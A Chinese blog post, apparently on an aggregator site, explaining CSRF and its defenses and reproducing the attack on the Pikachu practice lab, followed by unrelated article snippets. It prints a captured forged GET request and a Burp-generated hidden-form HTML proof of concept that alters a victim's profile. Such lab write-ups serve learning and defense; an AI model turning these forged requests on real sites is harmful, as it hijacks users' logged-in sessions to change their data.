Csrf复习(pikachu靶场和防御手段)

CSRF漏洞简介

CSRF又称跨站请求伪造,是指攻击者在用户登录的状态下(浏览器保存了用户的cookie)通过伪造恶意url诱导用户点击,借助用户的cookie网站权限(冒充用户身份来进行非法操作,对于服务器来说是合法的)达到篡改数据、购买商品等非法操作。

CSRF漏洞形成的条件

通过上面的讲解我们知道CSRF形成的必要条件是

1、用户要在登录状态(即浏览器保存了该用户的cookie)

2、用户要访问攻击者发的恶意url链接才行

常见攻击方式

1、 链接点击:攻击者通过邮件、社交媒体或其他方式发送包含恶意请求的链接,诱导用户点击。

2、隐藏表单:在恶意网站上嵌入隐藏的表单,用户在不知情的情况下触发表单提交。

3、自动提交表单:恶意网站使用JavaScript自动提交包含恶意请求的表单。

4、图像加载:在恶意网站上嵌入图像标签,图像URL指向目标网站的恶意请求。

5、跨域请求:利用XMLHttpRequest或Fetch API发送跨域请求,但这种方式在现代浏览器中通常会被同源策略和CORS限制。

防御措施

1、CSRF Token:在每个敏感操作的请求中包含唯一的、不可预测的令牌。服务器验证该令牌以确保请求来自合法用户。

2、SameSite Cookie 属性:设置 Cookie 的 SameSite 属性为 Strict 或 Lax,防止跨站请求携带 Cookie。

3、双重提交 Cookie:在请求中发送一个 CSRF Token,同时在 Cookie 中存储相同的 Token,服务器验证这两个 Token 是否一致。

4、验证 Referer 和 Origin 头:检查请求的 Referer 和 Origin 头是否来自可信任的域。

5、定期重置 Session ID:减少会话被劫持的风险,确保会话令牌的安全性。

6、用户交互确认:对敏感操作要求用户进行额外的确认,例如输入密码或验证码。

漏洞复现(pikachu)

Csrf(get请求):

攻击者发送恶意链接,点开后信息被恶意修改

利用bp抓取的数据包重发数据

GET /vul/csrf/csrfget/csrf_get_edit.php?sex=hack&phonenum=123123&add=123123&email=123123&submit=submit HTTP/1.1

Host: pikachu

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Referer: http://pikachu/vul/csrf/csrfget/csrf_get_edit.php

Cookie: PHPSESSID=1403c4j739t0v88bc26m3b2d6e

Upgrade-Insecure-Requests: 1

Priority: u=0, i

信息被修改了

Csrf(post请求)

记录原始数据

Bp抓包构造恶意网页

<html>

  <!-- CSRF PoC - generated by Burp Suite Professional -->

  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="http://pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">

      <input type="hidden" name="sex" value="hack" />

      <input type="hidden" name="phonenum" value="hack" />

      <input type="hidden" name="add" value="11" />

      <input type="hidden" name="email" value="111" />

      <input type="hidden" name="submit" value="submit" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>

放在外网服务器

点击恶意连接后信息被修改了

Csrf(token)抓包发现添加了token需要知道token才可以被攻击者恶意利用

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/51013.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

视觉SLAM第二讲

SLAM分为定位和建图两个问题。 定位问题 定位问题是通过传感器观测数据直接或间接求解位置和姿态。 通常可以分为两类&#xff1a;基于已知地图的定位和基于未知地图的定位。 基于已知地图的定位 利用预先构建的地图&#xff0c;结合传感器数据进行全局定位。SLAM中的全局…

如何利用开源Bug管理系统提高团队效率

国内外主流的10款开源bug管理系统对比&#xff1a;PingCode、Worktile、Trac、WebIssues、MantisBT、Bugzilla 、Fossil、The Bug Genie、TestLink 、OpenProject。 在软件开发的复杂世界中&#xff0c;Bug管理可能是一个令人头疼的问题&#xff0c;尤其是当工具不足以捕捉和解…

这才是做项目的正确打开方式

基于大数据的推荐机制&#xff0c;对于没有接触到信息的人而言&#xff0c;会认为获取行业外的信息会很困难&#xff0c;对于已经接触到信息的人而言&#xff0c;又会出现选择困难症。当系统对你锁定标签后&#xff0c;就会频繁的给你推荐跟标签对应的信息&#xff0c;信息一多…

[PM]面试题-能力问题

你在公司里面主要做什么? 负责产品的全生命周期的管理, 包括产品调研, 需求整理, 产品设计,文档产出, 产品评审, 项目推进, 产品迭代等工作 你是怎么做需求分析的? 首先我们要收集需求, 然后把需求放到需求池里进行管理, 需求管理首先要对需求进行优先级划分, 在根据需求设…

DjangoRF-8-9-modules和interfaces接口

1、接口编写顺序&#xff0c;同6–7一样。

quicgo

quic-go/quic-go 简介: Go语言实现的QUIC协议。&#xff08;QUIC是一个兼顾TCP连接的可靠性&#xff0c;同时大幅降低延迟的通用网络传输层协议&#xff09; | GitHub 中文社区 https://www.github-zh.com/projects/55637575-quic-go quic-go 是 Go 中 QUIC 协议&#xff08;…

Kafka面试三道题

针对Kafka的面试题&#xff0c;从简单到困难&#xff0c;我可以给出以下三道题目&#xff1a; 1. Kafka的基本概念与优势 问题&#xff1a;请简要介绍Kafka是什么&#xff0c;并说明它相比传统消息队列的优势有哪些&#xff1f; 答案&#xff1a; Kafka定义&#xff1a;Apa…

【传知代码】智慧医疗:纹理特征VS卷积特征(论文复现)

在这个无处不在的技术革新的时代&#xff0c;计算机视觉和机器学习成为了医疗领域中不可或缺的力量。在这篇文章中&#xff0c;我们将探讨两种突出的技术&#xff1a;纹理特征和卷积特征。它们如何在医学影像分析中竞争与协作&#xff0c;为医生提供更深入、更精确的诊断信息&a…

iOS基础---常用三方库:Masonry、SDWebImage

系列文章目录 iOS基础—多线程&#xff1a;GCD、NSThread、NSOperation iOS基础—Category vs Extension iOS基础—常用三方库&#xff1a;Masonry、SDWebImage 文章目录 系列文章目录一、Masonry1.Masonry简介2.使用示例3.源码剖析 二、SDWebImage1.SDWebImage简介2.主要功能…

不同WEB下的的ApplicationContext的选择

依赖 ApplicationContext类型选择 默认情况下&#xff0c;spring通过选择的web端的框架来选择使用哪个ApplicationContext子类&#xff0c;默认情况下我们一般使用spring mvc框架&#xff0c;这个时候AC的实现类为 org.springframework.boot.web.servlet.context.AnnotationC…

在 LCD 上显示 png 图片-I.MX6U嵌入式Linux C应用编程学习笔记基于正点原子阿尔法开发板

在 LCD 上显示 png 图片 PNG 简介 无损压缩&#xff1a;PNG 使用 LZ77 派生算法进行无损压缩&#xff0c;确保图像质量不受损&#xff0c;且压缩比高 体积小&#xff1a;通过高压缩比&#xff0c;PNG 文件体积小&#xff0c;适合网络传输 索引彩色模式&#xff1a;PNG-8 格式…

ChatGPT对话:关于训练模型h5格式和SavedModel格式的问题

【编者按】有几天没有更新&#xff0c;一直在学习和调试程序&#xff0c;其中有大量与ChatGPT的对话&#xff0c;遇到的每一个问题都找ChatGPT&#xff0c;再也没有用到百度和google。在ChatGPT的帮助下已完成Python下的花卉识别训练与预测&#xff0c;部署到网站&#xff0c;也…

计划外投料

计划外领料通过A07 R10发料/其他&#xff0c;进行计划外投料。移动类型仍然是261。 在科目分配页签。维护计划外投料的工单号。 在实际业务中&#xff0c;有的企业也会单独复制出一个移动类型。进行区分。 在COOIS中&#xff0c;有张表可以看出物料是计划内投料还是计划外。 …

MySQL查询执行(三):显示随机消息

假设有如下表结构&#xff1a; -- 创建表words CREATE TABLE words (id int(11) NOT NULL AUTO_INCREMENT,word varchar(64) DEFAULT NULL,PRIMARY KEY (id) ) ENGINEInnoDB;--数据生成存储过程 delimiter ;; create procedure idata() begindeclare i int;set i0;while i<…

[工具]GitHub + PicGo 搭建免费博客图床

文章目录 起因GitHub新建GitHub仓库新建token授予picgo权限 PicGOPicGO上传失败原因 起因 还是觉得个人博客记录最好还是不要money&#x1f625;&#xff0c;所以还是想白嫖&#xff0c;找到了GitHub PicGO的方式&#xff0c;记录一下。 GitHub 过程和搭建博客链接类似&…

DDOS攻击学习 - kali初学

文章目录 本地ssh配置nmap(网络连接的工具)nmap -sP IP地址nmap -p 1-65535 -A IP地址主机发现Ping扫描端口扫描时序扫描常用扫描方式指纹识别与探测全端口版本探测防火墙/IDS逃逸报文分段信息收集IP信息收集WHOIS查询数据库渗透测试MySQL列举数据库列举MySQL变量发起请求目录扫…

PostgreSQL的pg-collector工具

PostgreSQL的pg-collector工具 pg-collector 是一个用于 PostgreSQL 数据库的监控和数据收集工具。它主要用于收集 PostgreSQL 实例的性能指标、查询统计和日志信息&#xff0c;以便进行数据库性能分析和故障排查。通过收集这些数据&#xff0c;管理员可以更好地了解数据库的运…

day3 测试基础知识

1. 你认为性能测试的目的是什么&#xff1f;做好性能测试的工作的关键是什么&#xff1f; 性能测试工作的目的是检查系统是否满足在需求说明书中规定的性能&#xff0c;性能测试常常需要和强度测试结合起来&#xff0c;并常常要求同时进行软件和硬件的检测。 性能测试主要的关…

Laravel视图渲染封装

第一种 app/Helpers/ViewHelper.php 创建一个辅助函数&#xff0c;用于动态确定视图路径&#xff1a; <?php if (!function_exists(fetchView)) {function fetchView($data []){$currentAction \Route::currentRouteAction();list($controller, $method) explode(, $c…

关于SpringBoot项目利用阿里EasyExcel快捷导入Excel文件入库初始化数据的简单实现

一、问题描述 无论新项目还是旧项目&#xff0c;都会出现数据维护、数据初始化等操作&#xff0c;手动录显然很low(领导会骂你)&#xff0c;所以一般采用批量导入导出。这里你还在用原始读取excel逐行逐列去读取吗&#xff1f;2024了ok&#xff1f;利用工具是我们cv大师的一贯…